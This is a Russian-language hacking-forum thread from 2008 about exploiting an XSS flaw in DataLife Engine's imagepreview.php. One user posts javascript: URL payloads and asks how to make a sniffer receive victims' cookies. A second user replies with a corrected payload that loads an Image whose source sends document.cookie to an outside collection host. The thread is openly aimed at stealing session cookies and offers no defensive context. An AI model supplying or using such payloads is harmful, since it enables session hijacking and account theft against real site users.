PDA

Просмотр полной версии : XSS в DataLife Engine. Обсуждение.


Dr.Bodja
02.08.2008, 13:12
Есть уязвимость
_http://target.ru/engine/modules/imagepreview.php?image=javascript:alert(document.c ookie);

Нужно прилепить сниффер, чтобы куки на сниффер шли.

Пробывал так
_http://target.ru/engine/modules/imagepreview.php?image=javascript:alert(document.l ocation="http://site.ru/s.gif?"+document.cookie);

И так
_http://target.ru/engine/modules/imagepreview.php?image=javascript:alert(document.l ocation("http://site.ru/s.gif?"+document.cookie));

Подскажите что я делаю не так, и как нужно. Или это вообще невозможно?

ЗЫ: Если подобная тема уже есть, прошу эту удалить, и дать ссылку на более ранею.

Зарание спасибо за помощь.

С ув. DrBodja.

Isis
02.08.2008, 13:37
И зачем ты делаешь document.location?
Ты хочешь словить пустые куки?

http://target.ru/engine/modules/imagepreview.php?image=javascript:img=new Image();img.src="http://site.ru/s.gif?"+document.cookie;